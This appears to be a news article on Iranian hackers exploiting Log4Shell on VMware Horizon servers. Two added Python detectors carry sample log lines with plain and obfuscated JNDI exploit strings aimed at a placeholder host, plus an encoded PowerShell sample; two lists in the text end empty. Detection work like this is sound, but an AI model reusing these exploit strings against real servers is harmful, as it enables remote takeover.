Iranian hackers actively exploiting Log4j vulnerability to compromise VMware Horizon servers


After successfully exploiting the bug, they can run malicious PowerShell commands, install backdoors, and steal credentials from infected machines

Iranian state-sponsored hackers are actively exploiting the critical Log4j vulnerability to deploy backdoors on vulnerable VMware Horizon servers in an effort to collect sensitive information from victims, researchers from cyber security firm SentinelOne have warned.

The SentinelOne researchers named the group 'TunnelVision' because of its heavy reliance on tunnelling tools. According to them, the tools and tactics used by the group closely resemble those of a larger group tracked under the monikers Charming Kitten, Nemesis Kitten and Phosphorus.

TunnelVision's operations are characterised by widespread abuse of so-called 1-day vulnerabilities to break into organisations that have not yet installed recently released patches.

The Microsoft Exchange ProxyShell bugs and a FortiOS flaw (CVE-2018-13379) are two of the group's better-known targets.

"The most commonly deployed tunnelling tools used by the group are Fast Reverse Proxy Client (FRPC) and Plink," according to researchers.

SentinelOne's Amitai Ben Shushan Ehrlich and Yair Rigevsky said in a report that TunnelVision attackers are currently exploiting the Log4Shell bug on vulnerable systems to run malicious PowerShell commands, install backdoors, steal credentials and perform lateral movement.

VMware Horizon is a widely used desktop and application virtualisation product that runs on Windows, macOS and Linux. It is vulnerable to the Log4Shell flaws in the Log4j Java logging library.

Log4Shell, tracked as CVE-2021-44228, is a highly dangerous and easy-to-exploit flaw that lets malicious actors gain remote control over machines running applications written in the Java programming language.

According to the researchers, the vulnerability is triggered when a specially crafted string, supplied by the attacker through any of a variety of input vectors, is parsed and processed by the vulnerable Log4j component.
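Because the trigger is a lookup string that only needs to reach a logged field, one practical defensive check is to scan web-server access logs for it. The following is an added example (not code from the SentinelOne report or from VMware) that normalises the nested-lookup tricks commonly used to disguise the literal `jndi` token and then flags the line, its client address and the JNDI scheme; the log lines are constructed for illustration and the field layout is an assumption.

```python
import re
from typing import List

# Constructed web-server access log lines (not from the report). The Log4Shell
# trigger is a Log4j lookup such as "${jndi:...}" arriving in any field the
# application logs; here it is carried in the User-Agent header.
SAMPLE_LOG = """\
10.0.0.5 - - [15/Feb/2022:10:01:02 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [15/Feb/2022:10:01:07 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.10:1389/a}"
10.0.0.9 - - [15/Feb/2022:10:01:09 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${${lower:j}ndi:rmi://203.0.113.10:1099/b}"
10.0.0.9 - - [15/Feb/2022:10:01:11 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:dns://203.0.113.10/c}"
10.0.0.7 - - [15/Feb/2022:10:01:15 +0000] "GET /portal/?q=${env:HOME} HTTP/1.1" 200 512 "-" "curl/7.79"
"""

# ${lower:x} / ${upper:x} evaluate to the literal character, so collapse them.
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}", re.I)
# ${name:-default} evaluates to the default when the name is unset; ${::-x} is
# the degenerate form that always yields "x".
_DEFAULT_VALUE = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")
# After normalisation the dangerous lookup is visible as ${jndi:<scheme>...
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)", re.I)


def normalise_lookups(text: str, max_rounds: int = 10) -> str:
    """Collapse nested Log4j lookups (innermost first) until nothing changes."""
    for _ in range(max_rounds):
        new = _CASE_LOOKUP.sub(r"\1", text)
        new = _DEFAULT_VALUE.sub(r"\1", new)
        if new == text:
            break
        text = new
    return text


def find_jndi_lookups(log_text: str) -> List[dict]:
    """Return one record per log line that carries a JNDI lookup string."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        match = _JNDI.search(normalise_lookups(line))
        if match:
            hits.append({
                "line": lineno,
                "client": line.split()[0],          # first field is the client IP
                "scheme": match.group(1).lower(),   # ldap, rmi, dns, ...
            })
    return hits


if __name__ == "__main__":
    for hit in find_jndi_lookups(SAMPLE_LOG):
        print(f"line {hit['line']}: JNDI lookup ({hit['scheme']}) from {hit['client']}")
```

Note that the benign `${env:HOME}` on the last line is not flagged: only a lookup that resolves to `jndi:` is reported, which keeps the check usable as a triage filter rather than a noisy string match on `${`.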

After the bug was uncovered in December, Bitdefender said it had observed multiple attempts by attackers to deploy a ransomware payload on vulnerable systems by making use of the Log4Shell bug. Microsoft also confirmed Bitdefender's findings, stating that it had seen threat actors attempting to deliver Khonsari ransomware to self-hosted Minecraft servers by exploiting Log4Shell.

In the latest attacks by Iranian hackers, SentinelOne observed that the threat actors typically exploited the Log4j vulnerability to run PowerShell commands directly, and then executed additional commands through PowerShell reverse shells spawned from the Tomcat process.

VMware often uses Apache Tomcat to deploy its Java web applications. TunnelVision was also able to use this server as its foothold for remotely controlling the compromised networks.
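The parent-child relationship described above (a Tomcat service process launching PowerShell) is an unusual one on a Horizon server and is a good detection hook. The following is an added example (not code from the SentinelOne report or from VMware) that runs such a rule over a handful of constructed process-creation events; the field names are assumed to be normalised from an EDR or Sysmon feed, the file paths are invented, and keying on any parent image whose name contains "tomcat" is an assumption about how the Horizon Tomcat service appears in telemetry.

```python
import re
from pathlib import PureWindowsPath
from typing import Dict, List

# Child images worth alerting on when the parent is a Java application server.
SHELL_IMAGES = {"powershell.exe", "pwsh.exe", "cmd.exe"}

# An encoded command argument raises the severity; the base64 blob itself is not decoded here.
_ENCODED_ARG = re.compile(r"\s-(?:e|ec|enc|encodedcommand)\s", re.I)

# Constructed process-creation events (not from the report). Paths are invented;
# "UGxhY2Vob2xkZXI=" is simply base64 for the word "Placeholder".
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"host": "horizon-cs01",
     "parent_image": r"C:\Example\Horizon\bin\ws_TomcatService.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -nop -w hidden -enc UGxhY2Vob2xkZXI="},
    {"host": "horizon-cs01",
     "parent_image": r"C:\Example\Horizon\bin\ws_TomcatService.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": 'powershell.exe -c "Get-Service"'},
    {"host": "horizon-cs01",
     "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe"},
    {"host": "horizon-cs01",
     "parent_image": r"C:\Example\Horizon\bin\ws_TomcatService.exe",
     "image": r"C:\Example\Java\bin\java.exe",
     "command_line": "java.exe -jar app.jar"},
]


def is_tomcat(image_path: str) -> bool:
    """True when the image file name contains 'tomcat' (case-insensitive)."""
    return "tomcat" in PureWindowsPath(image_path).name.lower()


def flag_tomcat_spawned_shells(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Return an alert for every shell launched directly by a Tomcat process."""
    alerts = []
    for event in events:
        child = PureWindowsPath(event["image"]).name.lower()
        if not (is_tomcat(event["parent_image"]) and child in SHELL_IMAGES):
            continue
        encoded = _ENCODED_ARG.search(event["command_line"]) is not None
        alerts.append({
            "host": event["host"],
            "child": child,
            "severity": "high" if encoded else "medium",
            "command_line": event["command_line"],
        })
    return alerts


if __name__ == "__main__":
    for alert in flag_tomcat_spawned_shells(SAMPLE_EVENTS):
        print(f"[{alert['severity']}] {alert['host']}: tomcat -> {alert['child']}: {alert['command_line']}")
```

Interactive PowerShell under explorer.exe and a Java child under Tomcat are left alone; only the two Tomcat-to-PowerShell launches are reported, the one carrying an encoded command at higher severity.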

Once PowerShell access is established, the group can easily carry out various malicious activities, including:

The researchers also observed that the Iranian hackers used multiple "legitimate" services both to carry out and to obscure their activities. Those services include:

This is not the first time that hackers have used Log4j bugs to compromise VMware Horizon servers.

Last month, the NHS cyber alert service warned that an unknown threat group was attacking unpatched VMware Horizon servers using the Log4Shell vulnerability in order to establish a presence within the affected networks.

Having achieved that objective, the attackers could steal data or deploy malicious software such as ransomware, it warned.

And Horizon is not the only VMware software affected by the Log4Shell bug.

Machines running VMware vCenter Server instances have also been attacked, including by the Conti ransomware gang.